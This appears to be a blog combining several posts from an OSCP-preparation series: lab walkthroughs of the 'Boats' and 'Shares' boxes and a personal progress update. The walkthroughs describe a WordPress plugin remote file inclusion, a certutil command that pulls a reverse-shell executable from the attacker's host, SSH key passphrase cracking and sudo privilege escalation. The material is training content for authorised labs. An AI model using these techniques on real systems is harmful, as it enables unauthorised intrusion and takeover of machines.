For my OSCP Preparations using HackTheBox, I’ll be following an awesome list made by TJ Null and the Mayor, Joe Helle. The list is curated here for your enjoyment. I did make a few changes – I sorted it out into Linux and Windows, and sorted from easiest to most difficult.
The purpose of doing this is to build up muscle memory in methodology, as well as get some great notes for taking the OSCP with.
For each box, I will write a walkthrough, and I will make a Youtube video of it as well. If it is during my stream time, I will livestream the work on it.
Thanks for coming along on the journey! I’m looking forward to this and crushing the OSCP before Christmas!
So the Boats box is a neat one, and I thoroughly enjoyed my first attempt at it live on Twitch the other day. Let’s dive right in and get after this!
Once we add the ip address to our /etc/hosts file, let’s get after this box with a good ol’ AutoRecon scan and check out the results. We see a bunch of ports open, including port 80, so while the scan is running, we can go check there.
Now, anytime I see a WordPress site, I get excited. And any time I see a potential plugin, I get even more excited. See that shopping cart label in the top right? That’s where I get excited.
So I kicked off a wpscan, and didn’t find anything, but I know there’s a plugin, so I clicked on the shopping cart and viewed the source. I see a plugin called “The Cart Press.” Let’s find vulnerabilities.
Over on Exploit Database, we see a few. The Remote File Inclusion one really piques my interest. Remote file inclusion will require us to host our own file to be called out by the vulnerability. Let’s hope we are on the right version and give it a shot!
Next step is to download one of my favorite remote shells and host it on a simple HTTP Server. I use the shell from https://github.com/namansahore/Remote-File-Inclusion-Shell. I highly recommend it (P.S., it’s forked on my repository as well!). Host that in the directory of your choice (I named mine shell.php) and fire up a simpleHTTPServer (I used sudo and did it on port 80).
Boom, that was where I browsed to from Exploit-DB, and below is what you get when you pop my favorite remote file!
At this point the remote shell won’t work, but you can issue windows commands like dir to verify you have control. A great command to use in this case is certutil, and you can upload files utilizing it.
Second, ensure your new shell.exe file is being hosted by your SimpleHTTPServer, and upload it with certutil. Here is the command line that worked for me: certutil -f http://10.10.0.11/shell.exe shell.exe
At this point, use msfconsole to kick off a meterpreter listener, as shown below, and run that shell.exe command! It’s going to be slow to connect, but once it does, you will be nt authority/system and be able to go get your flags!
Thanks for catching the next writeup in my OSCP Prep series of writeups for CyberSecLabs! Stay tuned for the YouTube video to follow! And as always, keep hacking!
After adding the alias shares.csl to my /etc/hosts file, I kicked off AutoRecon and took a close look at the results. Here we see port 21 (FTP), port 80 (HTTP), port 111 (RPC), port 2049 (NFS), and port 27853 (Running SSH!), as well as some higher level ports. This high SSH port seemed odd to me.
Looking into the easy ports here, with NFS (Network File Sharing), we take a look at the nmap scan that was run on Port 111, and we see the following mount:
We mount this drive and see what we’ve got:
Thinking back to the high-port number running SSH, I bet that .ssh directory may be interesting!
Unfortunately, when you try using the private SSH key to login, and if you paid attention above, you’ll be denied access, asking for a passphrase, as the key is …. ENCRYPTED! But have no fear, ssh2john is here!
Once you have it prepped for john, run john with the rockyou.txt wordlist to find the passphrase for the original key!
Now that we have the passphrase, don’t forget to chmod 600 the original private key and let’s login. Once logged in, run sudo -l, and we see there’s a user named amy that we can run /usr/bin/pkexec or /usr/bin/python3 as.
It’s trivial at this point to get on as amy. Simply search GTFOBins for the python binary, and take a look at sudo privileges, https://gtfobins.github.io/gtfobins/python/. Switching users to amy and running python is a breeze.
Now, as amy, don’t forget to get the access.txt flag, and let’s sudo -l again! Now you see that we can run /usr/bin/ssh as anyone we want with no password, including root!
This will be Day 3 of my OSCP Preparation. The mind-map linked in the previous post is what I’m still working on, but I just want to first take a moment out of discussing purely hacking to talk about how humbled I am. Veteran Security concluded their board elections a little over a week ago, and on June 1st, 2020, I took over as the Board Chair for the company. It’s an amazing organization owned and run by veterans for veterans transitioning into cyber security. We have some pretty awesome things planned, but that’s nothing compared to what the group has already done for so many, myself included. More than simply providing resources and guides to transition, Veteran Security (VetSec, Inc.) provides a much needed community – a place for veterans to discuss the issues that face our community and be there for one another.
Now then, Day 3 of OSCP. I have completed OverTheWire: Bandit through Level 23, and I have completed Wave 1 of the Zero to Hero blog for TryHackMe. Both platforms have been great for solidifying basic Linux command knowledge, establishing a solid methodology, and exposing me to many different vulnerabilities present in both Linux and Windows.
Much of what I’ve been done has been walkthrough style so far. I anticipate around next week (Day 10 OSCP or so) I will move into the lists of machines provided by TJ-Null and start working on VulnHub and HackTheBox machines. This is where it’ll get real.
I continue to make videos for my YouTube Channel, like this walkthrough of LazyAdmin on TryHackMe, and I continue to stream daily. This has been a great way for me to reinforce the knowledge I’ve gained by doing the same box a couple times.
Anyways, if you like following and learning along with me, keep checking out my YouTube and my Twitch and I’ll see you there!